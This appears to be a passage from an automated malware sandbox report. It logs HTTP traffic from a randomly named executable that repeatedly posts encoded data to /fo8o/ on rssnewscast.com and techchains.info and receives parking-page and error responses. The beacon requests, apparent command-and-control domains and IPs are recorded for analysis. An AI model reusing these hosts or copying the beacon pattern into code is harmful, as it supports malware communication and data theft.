                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      10 | 192.168.2.6 | 50021 | 91.195.240.94 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:33:20.860075951 CET | 813 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.rssnewscast.com
                                                                                      Origin: http://www.rssnewscast.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 236
                                                                                      Referer: http://www.rssnewscast.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6a 69 6b 58 4d 38 52 6e 32 61 4b 51 52 6c 6d 5a 47 35 33 4e 66 73 33 6c 50 63 61 46 6e 63 73 47 78 34 4f 35 64 41 2f 36 77 76 55 67 3d 3d
                                                                                      Data Ascii: U6YDsxW=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBjikXM8Rn2aKQRlmZG53Nfs3lPcaFncsGx4O5dA/6wvUg==
                                                                                      Dec 2, 2024 14:33:22.182287931 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                                      date: Mon, 02 Dec 2024 13:33:21 GMT
                                                                                      content-type: text/html
                                                                                      content-length: 556
                                                                                      server: Parking/1.0
                                                                                      connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      11 | 192.168.2.6 | 50022 | 91.195.240.94 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:33:23.511895895 CET | 1826 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.rssnewscast.com
                                                                                      Origin: http://www.rssnewscast.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.rssnewscast.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 77 6a 67 5a 67 33 54 38 58 6f 6d 56 6a 6d 6f 4b 79 67 56 33 62 54 52 31 66 6d 45 79 6a 50 6e 59 6b 47 6d 6b 41 4e 56 45 4f 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 79 2b 61 4a 62 59 31 5a 48 78 31 41 61 67 46 6b 4d 43 2f 78 36 39 56 2b 67 36 67 49 4a 52 42 2b 63 46 6e 7a 4f 31 73 77 61 33 61 77 57 72 65 58 66 5a 65 34 66 34 4f 67 4b 44 72 48 4f 74 64 6a 79 68 53 66 4d 69 69 72 70 62 46 6a 45 55 48 62 [TRUNCATED]
                                                                                      Data Ascii: U6YDsxW=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 [TRUNCATED]
                                                                                      Dec 2, 2024 14:33:24.791945934 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                                      date: Mon, 02 Dec 2024 13:33:24 GMT
                                                                                      content-type: text/html
                                                                                      content-length: 556
                                                                                      server: Parking/1.0
                                                                                      connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      12 | 192.168.2.6 | 50023 | 91.195.240.94 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:33:26.171762943 CET | 526 | OUT | GET /fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkF HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.rssnewscast.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 2, 2024 14:33:27.520663023 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                      date: Mon, 02 Dec 2024 13:33:27 GMT
                                                                                      content-type: text/html; charset=UTF-8
                                                                                      transfer-encoding: chunked
                                                                                      vary: Accept-Encoding
                                                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      pragma: no-cache
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_IZMInbEcD5Xm02apOhdZLK+kTJCzf5wB9pY9wfOAGVCY1j4K+5ZsZE82BZWbIa1+GsVOEqDzq2FMFB+QQDBreA==
                                                                                      last-modified: Mon, 02 Dec 2024 13:33:27 GMT
                                                                                      x-cache-miss-from: parking-7ffff5845f-5wfp4
                                                                                      server: Parking/1.0
                                                                                      connection: close
                                                                                      Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 49 5a 4d 49 6e 62 45 63 44 35 58 6d 30 32 61 70 4f 68 64 5a 4c 4b 2b 6b 54 4a 43 7a 66 35 77 42 39 70 59 39 77 66 4f 41 47 56 43 59 31 6a 34 4b 2b 35 5a 73 5a 45 38 32 42 5a 57 62 49 61 31 2b 47 73 56 4f 45 71 44 7a 71 32 46 4d 46 42 2b 51 51 44 42 72 65 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                      Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_IZMInbEcD5Xm02apOhdZLK+kTJCzf5wB9pY9wfOAGVCY1j4K+5ZsZE82BZWbIa1+GsVOEqDzq2FMFB+QQDBreA==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
                                                                                      Dec 2, 2024 14:33:27.520694971 CET | 1236 | IN | Data Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66
                                                                                      Data Ascii: on youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.
                                                                                      Dec 2, 2024 14:33:27.520711899 CET | 448 | IN | Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d
                                                                                      Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
                                                                                      Dec 2, 2024 14:33:27.520725965 CET | 1236 | IN | Data Raw: 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 72 65 73 65
                                                                                      Data Ascii: earance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[
                                                                                      Dec 2, 2024 14:33:27.520741940 CET | 1236 | IN | Data Raw: 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 0d 0a 32 35 0d 0a 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 61 75 74 6f 20 32 30 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69
                                                                                      Data Ascii: content{color:#717171}.container-content25{margin:25px auto 20px auto;text-alig105Cn:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #fbfbfb no-repeat center top;background-size:100%}.container-content
                                                                                      Dec 2, 2024 14:33:27.520755053 CET | 1236 | IN | Data Raw: 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 30 61 34 38 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 30
                                                                                      Data Ascii: ration:underline;color:#0a48ff}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#000}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#0a48ff}.two-tier-ads-list_
                                                                                      Dec 2, 2024 14:33:27.520771980 CET | 672 | IN | Data Raw: 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 31 39 64 61 36 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f
                                                                                      Data Ascii: xt{font-size:12px}.container-buybox__content-link{color:#919da6}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;fo
                                                                                      Dec 2, 2024 14:33:27.520930052 CET | 1236 | IN | Data Raw: 61 69 6d 65 72 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 35 35 35 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64
                                                                                      Data Ascii: aimer a{font-size:10px}.container-disclaimer__content-text{color:#555}.container-disclaimer a{color:#555}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint_
                                                                                      Dec 2, 2024 14:33:27.520946026 CET | 1236 | IN | Data Raw: 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e
                                                                                      Data Ascii: -top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:al
                                                                                      Dec 2, 2024 14:33:27.520958900 CET | 70 | IN | Data Raw: 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 0d 0a
                                                                                      Data Ascii: olor:#218838;border-color:#218838;color:#fff;font-size:initial}.btn-
                                                                                      Dec 2, 2024 14:33:27.640950918 CET | 1236 | IN | Data Raw: 37 32 30 0d 0a 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f
                                                                                      Data Ascii: 720-success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-c


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      13 | 192.168.2.6 | 50024 | 66.29.149.46 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:33:41.749818087 CET | 789 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.techchains.info
                                                                                      Origin: http://www.techchains.info
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 212
                                                                                      Referer: http://www.techchains.info/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 74 71 7a 62 69 56 74 64 67 41 4d 61 68 6b 63 31 58 46 58 6a 46 4e 53 73 7a 55 6d 75 62 7a 39 48 6b 53 50 39 73 4e 6b 41 59 54 57
                                                                                      Data Ascii: U6YDsxW=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXItqzbiVtdgAMahkc1XFXjFNSszUmubz9HkSP9sNkAYTW
                                                                                      Dec 2, 2024 14:33:42.987880945 CET637INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:33:42 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 50025 | 66.29.149.46 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:33:44.402884960 CET | 813 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.techchains.info
Origin: http://www.techchains.info
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
Referer: http://www.techchains.info/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
